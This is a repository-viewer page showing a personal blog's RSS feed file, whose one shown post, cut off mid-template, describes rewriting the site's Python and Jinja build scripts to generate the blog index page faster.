all repos — site @ d71a372ce5091475f3b015ad9458b561b0ae2308

source for my site, found at icyphox.sh

pages/blog/feed.xml (view raw)

 1
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
 100
 101
 102
 103
 104
 105
 106
 107
 108
 109
 110
 111
 112
 113
 114
 115
 116
 117
 118
 119
 120
 121
 122
 123
 124
 125
 126
 127
 128
 129
 130
 131
 132
 133
 134
 135
 136
 137
 138
 139
 140
 141
 142
 143
 144
 145
 146
 147
 148
 149
 150
 151
 152
 153
 154
 155
 156
 157
 158
 159
 160
 161
 162
 163
 164
 165
 166
 167
 168
 169
 170
 171
 172
 173
 174
 175
 176
 177
 178
 179
 180
 181
 182
 183
 184
 185
 186
 187
 188
 189
 190
 191
 192
 193
 194
 195
 196
 197
 198
 199
 200
 201
 202
 203
 204
 205
 206
 207
 208
 209
 210
 211
 212
 213
 214
 215
 216
 217
 218
 219
 220
 221
 222
 223
 224
 225
 226
 227
 228
 229
 230
 231
 232
 233
 234
 235
 236
 237
 238
 239
 240
 241
 242
 243
 244
 245
 246
 247
 248
 249
 250
 251
 252
 253
 254
 255
 256
 257
 258
 259
 260
 261
 262
 263
 264
 265
 266
 267
 268
 269
 270
 271
 272
 273
 274
 275
 276
 277
 278
 279
 280
 281
 282
 283
 284
 285
 286
 287
 288
 289
 290
 291
 292
 293
 294
 295
 296
 297
 298
 299
 300
 301
 302
 303
 304
 305
 306
 307
 308
 309
 310
 311
 312
 313
 314
 315
 316
 317
 318
 319
 320
 321
 322
 323
 324
 325
 326
 327
 328
 329
 330
 331
 332
 333
 334
 335
 336
 337
 338
 339
 340
 341
 342
 343
 344
 345
 346
 347
 348
 349
 350
 351
 352
 353
 354
 355
 356
 357
 358
 359
 360
 361
 362
 363
 364
 365
 366
 367
 368
 369
 370
 371
 372
 373
 374
 375
 376
 377
 378
 379
 380
 381
 382
 383
 384
 385
 386
 387
 388
 389
 390
 391
 392
 393
 394
 395
 396
 397
 398
 399
 400
 401
 402
 403
 404
 405
 406
 407
 408
 409
 410
 411
 412
 413
 414
 415
 416
 417
 418
 419
 420
 421
 422
 423
 424
 425
 426
 427
 428
 429
 430
 431
 432
 433
 434
 435
 436
 437
 438
 439
 440
 441
 442
 443
 444
 445
 446
 447
 448
 449
 450
 451
 452
 453
 454
 455
 456
 457
 458
 459
 460
 461
 462
 463
 464
 465
 466
 467
 468
 469
 470
 471
 472
 473
 474
 475
 476
 477
 478
 479
 480
 481
 482
 483
 484
 485
 486
 487
 488
 489
 490
 491
 492
 493
 494
 495
 496
 497
 498
 499
 500
 501
 502
 503
 504
 505
 506
 507
 508
 509
 510
 511
 512
 513
 514
 515
 516
 517
 518
 519
 520
 521
 522
 523
 524
 525
 526
 527
 528
 529
 530
 531
 532
 533
 534
 535
 536
 537
 538
 539
 540
 541
 542
 543
 544
 545
 546
 547
 548
 549
 550
 551
 552
 553
 554
 555
 556
 557
 558
 559
 560
 561
 562
 563
 564
 565
 566
 567
 568
 569
 570
 571
 572
 573
 574
 575
 576
 577
 578
 579
 580
 581
 582
 583
 584
 585
 586
 587
 588
 589
 590
 591
 592
 593
 594
 595
 596
 597
 598
 599
 600
 601
 602
 603
 604
 605
 606
 607
 608
 609
 610
 611
 612
 613
 614
 615
 616
 617
 618
 619
 620
 621
 622
 623
 624
 625
 626
 627
 628
 629
 630
 631
 632
 633
 634
 635
 636
 637
 638
 639
 640
 641
 642
 643
 644
 645
 646
 647
 648
 649
 650
 651
 652
 653
 654
 655
 656
 657
 658
 659
 660
 661
 662
 663
 664
 665
 666
 667
 668
 669
 670
 671
 672
 673
 674
 675
 676
 677
 678
 679
 680
 681
 682
 683
 684
 685
 686
 687
 688
 689
 690
 691
 692
 693
 694
 695
 696
 697
 698
 699
 700
 701
 702
 703
 704
 705
 706
 707
 708
 709
 710
 711
 712
 713
 714
 715
 716
 717
 718
 719
 720
 721
 722
 723
 724
 725
 726
 727
 728
 729
 730
 731
 732
 733
 734
 735
 736
 737
 738
 739
 740
 741
 742
 743
 744
 745
 746
 747
 748
 749
 750
 751
 752
 753
 754
 755
 756
 757
 758
 759
 760
 761
 762
 763
 764
 765
 766
 767
 768
 769
 770
 771
 772
 773
 774
 775
 776
 777
 778
 779
 780
 781
 782
 783
 784
 785
 786
 787
 788
 789
 790
 791
 792
 793
 794
 795
 796
 797
 798
 799
 800
 801
 802
 803
 804
 805
 806
 807
 808
 809
 810
 811
 812
 813
 814
 815
 816
 817
 818
 819
 820
 821
 822
 823
 824
 825
 826
 827
 828
 829
 830
 831
 832
 833
 834
 835
 836
 837
 838
 839
 840
 841
 842
 843
 844
 845
 846
 847
 848
 849
 850
 851
 852
 853
 854
 855
 856
 857
 858
 859
 860
 861
 862
 863
 864
 865
 866
 867
 868
 869
 870
 871
 872
 873
 874
 875
 876
 877
 878
 879
 880
 881
 882
 883
 884
 885
 886
 887
 888
 889
 890
 891
 892
 893
 894
 895
 896
 897
 898
 899
 900
 901
 902
 903
 904
 905
 906
 907
 908
 909
 910
 911
 912
 913
 914
 915
 916
 917
 918
 919
 920
 921
 922
 923
 924
 925
 926
 927
 928
 929
 930
 931
 932
 933
 934
 935
 936
 937
 938
 939
 940
 941
 942
 943
 944
 945
 946
 947
 948
 949
 950
 951
 952
 953
 954
 955
 956
 957
 958
 959
 960
 961
 962
 963
 964
 965
 966
 967
 968
 969
 970
 971
 972
 973
 974
 975
 976
 977
 978
 979
 980
 981
 982
 983
 984
 985
 986
 987
 988
 989
 990
 991
 992
 993
 994
 995
 996
 997
 998
 999
 1000
 1001
 1002
 1003
 1004
 1005
 1006
 1007
 1008
 1009
 1010
 1011
 1012
 1013
 1014
 1015
 1016
 1017
 1018
 1019
 1020
 1021
 1022
 1023
 1024
 1025
 1026
 1027
 1028
 1029
 1030
 1031
 1032
 1033
 1034
 1035
 1036
 1037
 1038
 1039
 1040
 1041
 1042
 1043
 1044
 1045
 1046
 1047
 1048
 1049
 1050
 1051
 1052
 1053
 1054
 1055
 1056
 1057
 1058
 1059
 1060
 1061
 1062
 1063
 1064
 1065
 1066
 1067
 1068
 1069
 1070
 1071
 1072
 1073
 1074
 1075
 1076
 1077
 1078
 1079
 1080
 1081
 1082
 1083
 1084
 1085
 1086
 1087
 1088
 1089
 1090
 1091
 1092
 1093
 1094
 1095
 1096
 1097
 1098
 1099
 1100
 1101
 1102
 1103
 1104
 1105
 1106
 1107
 1108
 1109
 1110
 1111
 1112
 1113
 1114
 1115
 1116
 1117
 1118
 1119
 1120
 1121
 1122
 1123
 1124
 1125
 1126
 1127
 1128
 1129
 1130
 1131
 1132
 1133
 1134
 1135
 1136
 1137
 1138
 1139
 1140
 1141
 1142
 1143
 1144
 1145
 1146
 1147
 1148
 1149
 1150
 1151
 1152
 1153
 1154
 1155
 1156
 1157
 1158
 1159
 1160
 1161
 1162
 1163
 1164
 1165
 1166
 1167
 1168
 1169
 1170
 1171
 1172
 1173
 1174
 1175
 1176
 1177
 1178
 1179
 1180
 1181
 1182
 1183
 1184
 1185
 1186
 1187
 1188
 1189
 1190
 1191
 1192
 1193
 1194
 1195
 1196
 1197
 1198
 1199
 1200
 1201
 1202
 1203
 1204
 1205
 1206
 1207
 1208
 1209
 1210
 1211
 1212
 1213
 1214
 1215
 1216
 1217
 1218
 1219
 1220
 1221
 1222
 1223
 1224
 1225
 1226
 1227
 1228
 1229
 1230
 1231
 1232
 1233
 1234
 1235
 1236
 1237
 1238
 1239
 1240
 1241
 1242
 1243
 1244
 1245
 1246
 1247
 1248
 1249
 1250
 1251
 1252
 1253
 1254
 1255
 1256
 1257
 1258
 1259
 1260
 1261
 1262
 1263
 1264
 1265
 1266
 1267
 1268
 1269
 1270
 1271
 1272
 1273
 1274
 1275
 1276
 1277
 1278
 1279
 1280
 1281
 1282
 1283
 1284
 1285
 1286
 1287
 1288
 1289
 1290
 1291
 1292
 1293
 1294
 1295
 1296
 1297
 1298
 1299
 1300
 1301
 1302
 1303
 1304
 1305
 1306
 1307
 1308
 1309
 1310
 1311
 1312
 1313
 1314
 1315
 1316
 1317
 1318
 1319
 1320
 1321
 1322
 1323
 1324
 1325
 1326
 1327
 1328
 1329
 1330
 1331
 1332
 1333
 1334
 1335
 1336
 1337
 1338
 1339
 1340
 1341
 1342
 1343
 1344
 1345
 1346
 1347
 1348
 1349
 1350
 1351
 1352
 1353
 1354
 1355
 1356
 1357
 1358
 1359
 1360
 1361
 1362
 1363
 1364
 1365
 1366
 1367
 1368
 1369
 1370
 1371
 1372
 1373
 1374
 1375
 1376
 1377
 1378
 1379
 1380
 1381
 1382
 1383
 1384
 1385
 1386
 1387
 1388
 1389
 1390
 1391
 1392
 1393
 1394
 1395
 1396
 1397
 1398
 1399
 1400
 1401
 1402
 1403
 1404
 1405
 1406
 1407
 1408
 1409
 1410
 1411
 1412
 1413
 1414
 1415
 1416
 1417
 1418
 1419
 1420
 1421
 1422
 1423
 1424
 1425
 1426
 1427
 1428
 1429
 1430
 1431
 1432
 1433
 1434
 1435
 1436
 1437
 1438
 1439
 1440
 1441
 1442
 1443
 1444
 1445
 1446
 1447
 1448
 1449
 1450
 1451
 1452
 1453
 1454
 1455
 1456
 1457
 1458
 1459
 1460
 1461
 1462
 1463
 1464
 1465
 1466
 1467
 1468
 1469
 1470
 1471
 1472
 1473
 1474
 1475
 1476
 1477
 1478
 1479
 1480
 1481
 1482
 1483
 1484
 1485
 1486
 1487
 1488
 1489
 1490
 1491
 1492
 1493
 1494
 1495
 1496
 1497
 1498
 1499
 1500
 1501
 1502
 1503
 1504
 1505
 1506
 1507
 1508
 1509
 1510
 1511
 1512
 1513
 1514
 1515
 1516
 1517
 1518
 1519
 1520
 1521
 1522
 1523
 1524
 1525
 1526
 1527
 1528
 1529
 1530
 1531
 1532
 1533
 1534
 1535
 1536
 1537
 1538
 1539
 1540
 1541
 1542
 1543
 1544
 1545
 1546
 1547
 1548
 1549
 1550
 1551
 1552
 1553
 1554
 1555
 1556
 1557
 1558
 1559
 1560
 1561
 1562
 1563
 1564
 1565
 1566
 1567
 1568
 1569
 1570
 1571
 1572
 1573
 1574
 1575
 1576
 1577
 1578
 1579
 1580
 1581
 1582
 1583
 1584
 1585
 1586
 1587
 1588
 1589
 1590
 1591
 1592
 1593
 1594
 1595
 1596
 1597
 1598
 1599
 1600
 1601
 1602
 1603
 1604
 1605
 1606
 1607
 1608
 1609
 1610
 1611
 1612
 1613
 1614
 1615
 1616
 1617
 1618
 1619
 1620
 1621
 1622
 1623
 1624
 1625
 1626
 1627
 1628
 1629
 1630
 1631
 1632
 1633
 1634
 1635
 1636
 1637
 1638
 1639
 1640
 1641
 1642
 1643
 1644
 1645
 1646
 1647
 1648
 1649
 1650
 1651
 1652
 1653
 1654
 1655
 1656
 1657
 1658
 1659
 1660
 1661
 1662
 1663
 1664
 1665
 1666
 1667
 1668
 1669
 1670
 1671
 1672
 1673
 1674
 1675
 1676
 1677
 1678
 1679
 1680
 1681
 1682
 1683
 1684
 1685
 1686
 1687
 1688
 1689
 1690
 1691
 1692
 1693
 1694
 1695
 1696
 1697
 1698
 1699
 1700
 1701
 1702
 1703
 1704
 1705
 1706
 1707
 1708
 1709
 1710
 1711
 1712
 1713
 1714
 1715
 1716
 1717
 1718
 1719
 1720
 1721
 1722
 1723
 1724
 1725
 1726
 1727
 1728
 1729
 1730
 1731
 1732
 1733
 1734
 1735
 1736
 1737
 1738
 1739
 1740
 1741
 1742
 1743
 1744
 1745
 1746
 1747
 1748
 1749
 1750
 1751
 1752
 1753
 1754
 1755
 1756
 1757
 1758
 1759
 1760
 1761
 1762
 1763
 1764
 1765
 1766
 1767
 1768
 1769
 1770
 1771
 1772
 1773
 1774
 1775
 1776
 1777
 1778
 1779
 1780
 1781
 1782
 1783
 1784
 1785
 1786
 1787
 1788
 1789
 1790
 1791
 1792
 1793
 1794
 1795
 1796
 1797
 1798
 1799
 1800
 1801
 1802
 1803
 1804
 1805
 1806
 1807
 1808
 1809
 1810
 1811
 1812
 1813
 1814
 1815
 1816
 1817
 1818
 1819
 1820
 1821
 1822
 1823
 1824
 1825
 1826
 1827
 1828
 1829
 1830
 1831
 1832
 1833
 1834
 1835
 1836
 1837
 1838
 1839
 1840
 1841
 1842
 1843
 1844
 1845
 1846
 1847
 1848
 1849
 1850
 1851
 1852
 1853
 1854
 1855
 1856
 1857
 1858
 1859
 1860
 1861
 1862
 1863
 1864
 1865
 1866
 1867
 1868
 1869
 1870
 1871
 1872
 1873
 1874
 1875
 1876
 1877
 1878
 1879
 1880
 1881
 1882
 1883
 1884
 1885
 1886
 1887
 1888
 1889
 1890
 1891
 1892
 1893
 1894
 1895
 1896
 1897
 1898
 1899
 1900
 1901
 1902
 1903
 1904
 1905
 1906
 1907
 1908
 1909
 1910
 1911
 1912
 1913
 1914
 1915
 1916
 1917
 1918
 1919
 1920
 1921
 1922
 1923
 1924
 1925
 1926
 1927
 1928
 1929
 1930
 1931
 1932
 1933
 1934
 1935
 1936
 1937
 1938
 1939
 1940
 1941
 1942
 1943
 1944
 1945
 1946
 1947
 1948
 1949
 1950
 1951
 1952
 1953
 1954
 1955
 1956
 1957
 1958
 1959
 1960
 1961
 1962
 1963
 1964
 1965
 1966
 1967
 1968
 1969
 1970
 1971
 1972
 1973
 1974
 1975
 1976
 1977
 1978
 1979
 1980
 1981
 1982
 1983
 1984
 1985
 1986
 1987
 1988
 1989
 1990
 1991
 1992
 1993
 1994
 1995
 1996
 1997
 1998
 1999
 2000
 2001
 2002
 2003
 2004
 2005
 2006
 2007
 2008
 2009
 2010
 2011
 2012
 2013
 2014
 2015
 2016
 2017
 2018
 2019
 2020
 2021
 2022
 2023
 2024
 2025
 2026
 2027
 2028
 2029
 2030
 2031
 2032
 2033
 2034
 2035
 2036
 2037
 2038
 2039
 2040
 2041
 2042
 2043
 2044
 2045
 2046
 2047
 2048
 2049
 2050
 2051
 2052
 2053
 2054
 2055
 2056
 2057
 2058
 2059
 2060
 2061
 2062
 2063
 2064
 2065
 2066
 2067
 2068
 2069
 2070
 2071
 2072
 2073
 2074
 2075
 2076
 2077
 2078
 2079
 2080
 2081
 2082
 2083
 2084
 2085
 2086
 2087
 2088
 2089
 2090
 2091
 2092
 2093
 2094
 2095
 2096
 2097
 2098
 2099
 2100
 2101
 2102
 2103
 2104
 2105
 2106
 2107
 2108
 2109
 2110
 2111
 2112
 2113
 2114
 2115
 2116
 2117
 2118
 2119
 2120
 2121
 2122
 2123
 2124
 2125
 2126
 2127
 2128
 2129
 2130
 2131
 2132
 2133
 2134
 2135
 2136
 2137
 2138
 2139
 2140
 2141
 2142
 2143
 2144
 2145
 2146
 2147
 2148
 2149
 2150
 2151
 2152
 2153
 2154
 2155
 2156
 2157
 2158
 2159
 2160
 2161
 2162
 2163
 2164
 2165
 2166
 2167
 2168
 2169
 2170
 2171
 2172
 2173
 2174
 2175
 2176
 2177
 2178
 2179
 2180
 2181
 2182
 2183
 2184
 2185
 2186
 2187
 2188
 2189
 2190
 2191
 2192
 2193
 2194
 2195
 2196
 2197
 2198
 2199
 2200
 2201
 2202
 2203
 2204
 2205
 2206
 2207
 2208
 2209
 2210
 2211
 2212
 2213
 2214
 2215
 2216
 2217
 2218
 2219
 2220
 2221
 2222
 2223
 2224
 2225
 2226
 2227
 2228
 2229
 2230
 2231
 2232
 2233
 2234
 2235
 2236
 2237
 2238
 2239
 2240
 2241
 2242
 2243
 2244
 2245
 2246
 2247
 2248
 2249
 2250
 2251
 2252
 2253
 2254
 2255
 2256
 2257
 2258
 2259
 2260
 2261
 2262
 2263
 2264
 2265
 2266
 2267
 2268
 2269
 2270
 2271
 2272
 2273
 2274
 2275
 2276
 2277
 2278
 2279
 2280
 2281
 2282
 2283
 2284
 2285
 2286
 2287
 2288
 2289
 2290
 2291
 2292
 2293
 2294
 2295
 2296
 2297
 2298
 2299
 2300
 2301
 2302
 2303
 2304
 2305
 2306
 2307
 2308
 2309
 2310
 2311
 2312
 2313
 2314
 2315
 2316
 2317
 2318
 2319
 2320
 2321
 2322
 2323
 2324
 2325
 2326
 2327
 2328
 2329
 2330
 2331
 2332
 2333
 2334
 2335
 2336
 2337
 2338
 2339
 2340
 2341
 2342
 2343
 2344
 2345
 2346
 2347
 2348
 2349
 2350
 2351
 2352
 2353
 2354
 2355
 2356
 2357
 2358
 2359
 2360
 2361
 2362
 2363
 2364
 2365
 2366
 2367
 2368
 2369
 2370
 2371
 2372
 2373
 2374
 2375
 2376
 2377
 2378
 2379
 2380
 2381
 2382
 2383
 2384
 2385
 2386
 2387
 2388
 2389
 2390
 2391
 2392
 2393
 2394
 2395
 2396
 2397
 2398
 2399
 2400
 2401
 2402
 2403
 2404
 2405
 2406
 2407
 2408
 2409
 2410
 2411
 2412
 2413
 2414
 2415
 2416
 2417
 2418
 2419
 2420
 2421
 2422
 2423
 2424
 2425
 2426
 2427
 2428
 2429
 2430
 2431
 2432
 2433
 2434
 2435
 2436
 2437
 2438
 2439
 2440
 2441
 2442
 2443
 2444
 2445
 2446
 2447
 2448
 2449
 2450
 2451
 2452
 2453
 2454
 2455
 2456
 2457
 2458
 2459
 2460
 2461
 2462
 2463
 2464
 2465
 2466
 2467
 2468
 2469
 2470
 2471
 2472
 2473
 2474
 2475
 2476
 2477
 2478
 2479
 2480
 2481
 2482
 2483
 2484
 2485
 2486
 2487
 2488
 2489
 2490
 2491
 2492
 2493
 2494
 2495
 2496
 2497
 2498
 2499
 2500
 2501
 2502
 2503
 2504
 2505
 2506
 2507
 2508
 2509
 2510
 2511
 2512
 2513
 2514
 2515
 2516
 2517
 2518
 2519
 2520
 2521
 2522
 2523
 2524
 2525
 2526
 2527
 2528
 2529
 2530
 2531
 2532
 2533
 2534
 2535
 2536
 2537
 2538
 2539
 2540
 2541
 2542
 2543
 2544
 2545
 2546
 2547
 2548
 2549
 2550
 2551
 2552
 2553
 2554
 2555
 2556
 2557
 2558
 2559
 2560
 2561
 2562
 2563
 2564
 2565
 2566
 2567
 2568
 2569
 2570
 2571
 2572
 2573
 2574
 2575
 2576
 2577
 2578
 2579
 2580
 2581
 2582
 2583
 2584
 2585
 2586
 2587
 2588
 2589
 2590
 2591
 2592
 2593
 2594
 2595
 2596
 2597
 2598
 2599
 2600
 2601
 2602
 2603
 2604
 2605
 2606
 2607
 2608
 2609
 2610
 2611
 2612
 2613
 2614
 2615
 2616
 2617
 2618
 2619
 2620
 2621
 2622
 2623
 2624
 2625
 2626
 2627
 2628
 2629
 2630
 2631
 2632
 2633
 2634
 2635
 2636
 2637
 2638
 2639
 2640
 2641
 2642
 2643
 2644
 2645
 2646
 2647
 2648
 2649
 2650
 2651
 2652
 2653
 2654
 2655
 2656
 2657
 2658
 2659
 2660
 2661
 2662
 2663
 2664
 2665
 2666
 2667
 2668
 2669
 2670
 2671
 2672
 2673
 2674
 2675
 2676
 2677
 2678
 2679
 2680
 2681
 2682
 2683
 2684
 2685
 2686
 2687
 2688
 2689
 2690
 2691
 2692
 2693
 2694
 2695
 2696
 2697
 2698
 2699
 2700
 2701
 2702
 2703
 2704
 2705
 2706
 2707
 2708
 2709
 2710
 2711
 2712
 2713
 2714
 2715
 2716
 2717
 2718
 2719
 2720
 2721
 2722
 2723
 2724
 2725
 2726
 2727
 2728
 2729
 2730
 2731
 2732
 2733
 2734
 2735
 2736
 2737
 2738
 2739
 2740
 2741
 2742
 2743
 2744
 2745
 2746
 2747
 2748
 2749
 2750
 2751
 2752
 2753
 2754
 2755
 2756
 2757
 2758
 2759
 2760
 2761
 2762
 2763
 2764
 2765
 2766
 2767
 2768
 2769
 2770
 2771
 2772
 2773
 2774
 2775
 2776
 2777
 2778
 2779
 2780
 2781
 2782
 2783
 2784
 2785
 2786
 2787
 2788
 2789
 2790
 2791
 2792
 2793
 2794
 2795
 2796
 2797
 2798
 2799
 2800
 2801
 2802
 2803
 2804
 2805
 2806
 2807
 2808
 2809
 2810
 2811
 2812
 2813
 2814
 2815
 2816
 2817
 2818
 2819
 2820
 2821
 2822
 2823
 2824
 2825
 2826
 2827
 2828
 2829
 2830
 2831
 2832
 2833
 2834
 2835
 2836
 2837
 2838
 2839
 2840
 2841
 2842
 2843
 2844
 2845
 2846
 2847
 2848
 2849
 2850
 2851
 2852
 2853
 2854
 2855
 2856
 2857
 2858
 2859
 2860
 2861
 2862
 2863
 2864
 2865
 2866
 2867
 2868
 2869
 2870
 2871
 2872
 2873
 2874
 2875
 2876
 2877
 2878
 2879
 2880
 2881
 2882
 2883
 2884
 2885
 2886
 2887
 2888
 2889
 2890
 2891
 2892
 2893
 2894
 2895
 2896
 2897
 2898
 2899
 2900
 2901
 2902
 2903
 2904
 2905
 2906
 2907
 2908
 2909
 2910
 2911
 2912
 2913
 2914
 2915
 2916
 2917
 2918
 2919
 2920
 2921
 2922
 2923
 2924
 2925
 2926
 2927
 2928
 2929
 2930
 2931
 2932
 2933
 2934
 2935
 2936
 2937
 2938
 2939
 2940
 2941
 2942
 2943
 2944
 2945
 2946
 2947
 2948
 2949
 2950
 2951
 2952
 2953
 2954
 2955
 2956
 2957
 2958
 2959
 2960
 2961
 2962
 2963
 2964
 2965
 2966
 2967
 2968
 2969
 2970
 2971
 2972
 2973
 2974
 2975
 2976
 2977
 2978
 2979
 2980
 2981
 2982
 2983
 2984
 2985
 2986
 2987
 2988
 2989
 2990
 2991
 2992
 2993
 2994
 2995
 2996
 2997
 2998
 2999
 3000
 3001
 3002
 3003
 3004
 3005
 3006
 3007
 3008
 3009
 3010
 3011
 3012
 3013
 3014
 3015
 3016
 3017
 3018
 3019
 3020
 3021
 3022
 3023
 3024
 3025
 3026
 3027
 3028
 3029
 3030
 3031
 3032
 3033
 3034
 3035
 3036
 3037
 3038
 3039
 3040
 3041
 3042
 3043
 3044
 3045
 3046
 3047
 3048
 3049
 3050
 3051
 3052
 3053
 3054
 3055
 3056
 3057
 3058
 3059
 3060
 3061
 3062
 3063
 3064
 3065
 3066
 3067
 3068
 3069
 3070
 3071
 3072
 3073
 3074
 3075
 3076
 3077
 3078
 3079
 3080
 3081
 3082
 3083
 3084
 3085
 3086
 3087
 3088
 3089
 3090
 3091
 3092
 3093
 3094
 3095
 3096
 3097
 3098
 3099
 3100
 3101
 3102
 3103
 3104
 3105
 3106
 3107
 3108
 3109
 3110
 3111
 3112
 3113
 3114
 3115
 3116
 3117
 3118
 3119
 3120
 3121
 3122
 3123
 3124
 3125
 3126
 3127
 3128
 3129
 3130
 3131
 3132
 3133
 3134
 3135
 3136
 3137
 3138
 3139
 3140
 3141
 3142
 3143
 3144
 3145
 3146
 3147
 3148
 3149
 3150
 3151
 3152
 3153
 3154
 3155
 3156
 3157
 3158
 3159
 3160
 3161
 3162
 3163
 3164
 3165
 3166
 3167
 3168
 3169
 3170
 3171
 3172
 3173
 3174
 3175
 3176
 3177
 3178
 3179
 3180
 3181
 3182
 3183
 3184
 3185
 3186
 3187
 3188
 3189
 3190
 3191
 3192
 3193
 3194
 3195
 3196
 3197
 3198
 3199
 3200
 3201
 3202
 3203
 3204
 3205
 3206
 3207
 3208
 3209
 3210
 3211
 3212
 3213
 3214
 3215
 3216
 3217
 3218
 3219
 3220
 3221
 3222
 3223
 3224
 3225
 3226
 3227
 3228
 3229
 3230
 3231
 3232
 3233
 3234
 3235
 3236
 3237
 3238
 3239
 3240
 3241
 3242
 3243
 3244
 3245
 3246
 3247
 3248
 3249
 3250
 3251
 3252
 3253
 3254
 3255
 3256
 3257
 3258
 3259
 3260
 3261
 3262
 3263
 3264
 3265
 3266
 3267
 3268
 3269
 3270
 3271
 3272
 3273
 3274
 3275
 3276
 3277
 3278
 3279
 3280
 3281
 3282
 3283
 3284
 3285
 3286
 3287
 3288
 3289
 3290
 3291
 3292
 3293
 3294
 3295
 3296
 3297
 3298
 3299
 3300
 3301
 3302
 3303
 3304
 3305
 3306
 3307
 3308
 3309
 3310
 3311
 3312
 3313
 3314
 3315
 3316
 3317
 3318
 3319
 3320
 3321
 3322
 3323
 3324
 3325
 3326
 3327
 3328
 3329
 3330
 3331
 3332
 3333
 3334
 3335
 3336
 3337
 3338
 3339
 3340
 3341
 3342
 3343
 3344
 3345
 3346
 3347
 3348
 3349
 3350
 3351
 3352
 3353
 3354
 3355
 3356
 3357
 3358
 3359
 3360
 3361
 3362
 3363
 3364
 3365
 3366
 3367
 3368
 3369
 3370
 3371
 3372
 3373
 3374
 3375
 3376
 3377
 3378
 3379
 3380
 3381
 3382
 3383
 3384
 3385
 3386
 3387
 3388
 3389
 3390
 3391
 3392
 3393
 3394
 3395
 3396
 3397
 3398
 3399
 3400
 3401
 3402
 3403
 3404
 3405
 3406
 3407
 3408
 3409
 3410
 3411
 3412
 3413
 3414
 3415
 3416
 3417
 3418
 3419
 3420
 3421
 3422
 3423
 3424
 3425
 3426
 3427
 3428
 3429
 3430
 3431
 3432
 3433
 3434
 3435
 3436
 3437
 3438
 3439
 3440
 3441
 3442
 3443
 3444
 3445
 3446
 3447
 3448
 3449
 3450
 3451
 3452
 3453
 3454
 3455
 3456
 3457
 3458
 3459
 3460
 3461
 3462
 3463
 3464
 3465
 3466
 3467
 3468
 3469
 3470
 3471
 3472
 3473
 3474
 3475
 3476
 3477
 3478
 3479
 3480
 3481
 3482
 3483
 3484
 3485
 3486
 3487
 3488
 3489
 3490
 3491
 3492
 3493
 3494
 3495
 3496
 3497
 3498
 3499
 3500
 3501
 3502
 3503
 3504
 3505
 3506
 3507
 3508
 3509
 3510
 3511
 3512
 3513
 3514
 3515
 3516
 3517
 3518
 3519
 3520
 3521
 3522
 3523
 3524
 3525
 3526
 3527
 3528
 3529
 3530
 3531
 3532
 3533
 3534
 3535
 3536
 3537
 3538
 3539
 3540
 3541
 3542
 3543
 3544
 3545
 3546
 3547
 3548
 3549
 3550
 3551
 3552
 3553
 3554
 3555
 3556
 3557
 3558
 3559
 3560
 3561
 3562
 3563
 3564
 3565
 3566
 3567
 3568
 3569
 3570
 3571
 3572
 3573
 3574
 3575
 3576
 3577
 3578
 3579
 3580
 3581
 3582
 3583
 3584
 3585
 3586
 3587
 3588
 3589
 3590
 3591
 3592
 3593
 3594
 3595
 3596
 3597
 3598
 3599
 3600
 3601
 3602
 3603
 3604
 3605
 3606
 3607
 3608
 3609
 3610
 3611
 3612
 3613
 3614
 3615
 3616
 3617
 3618
 3619
 3620
 3621
 3622
 3623
 3624
 3625
 3626
 3627
 3628
 3629
 3630
 3631
 3632
 3633
 3634
 3635
 3636
 3637
 3638
 3639
 3640
 3641
 3642
 3643
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>icyphox's blog</title>
	<link>https://icyphox.sh/</link>
    <description>Computers, security and computer security.</description>
	<atom:link href="https://icyphox.sh/blog/feed.xml" rel="self" type="application/xml"/>
    <image>
		<title>icyphox logo</title>
      <url>https://icyphox.sh/icyphox.png</url>
	  <link>https://icyphox.sh/</link>
    </image>
    <language>en-us</language>
	<copyright>Creative Commons BY-NC-SA 4.0</copyright>
    <item><title>Site changes</title><description><![CDATA[<p>The past couple of days, I&#8217;ve spent a fair amount of time tweaking this
site. My site&#8217;s build process involves
<a href="https://github.com/icyphox/vite">vite</a> and a bunch of
<a href="https://github.com/icyphox/site/tree/master/bin">scripts</a>. These
scripts are executed via vite&#8217;s pre- and post-build actions. The big
changes that were made were performance improvements in the
<code>update_index.py</code> script, and the addition of <code>openring.py</code>, which you
can see at the very bottom of this post!</p>

<h2 id="speeding-up-index-page-generation">speeding up index page generation</h2>

<p>The old script---the one that featured in <a href="/blog/hacky-scripts">Hacky
scripts</a>---was absolutely ridiculous, and not to
mention <em>super</em> slow. Here&#8217;s what it did:</p>

<ul>
<li>got the most recent file (latest post) by sorting all posts by
<code>mtime</code>.</li>
<li>parsed the markdown frontmatter and created a markdown table entry
like: </li>
</ul>

<div class="codehilite"><pre><span></span><code><span class="n">line</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&quot;| [</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">&#39;title&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">](</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s2">) | `</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">&#39;date&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">` |&quot;</span>
</code></pre></div>

<ul>
<li>updated the markdown table (in <code>_index.md</code>) by in-place editing the
markdown, with the line created earlier---for the latest post.</li>
<li>finally, I&#8217;d have to <em>rebuild</em> the entire site since this markdown
hackery would happen at the very end of the build, i.e, didn&#8217;t
actually get rendered itself. </li>
</ul>

<p>That&#8230;probably didn&#8217;t make much sense to you, did it? Don&#8217;t bother.
I don&#8217;t know what I was thinking when I wrote that mess. So with how it
<em>was</em> done aside, here&#8217;s how it&#8217;s done now:</p>

<ul>
<li>the metadata for all posts are nicely fetched and sorted using
<code>python-frontmatter</code>.</li>
<li>the metadata list is fed into Jinja for use in templating, and is
rendered very nicely using a simple <code>for</code> expression:</li>
</ul>

<pre><code>{% for p in posts %}
  &lt;tr&gt;
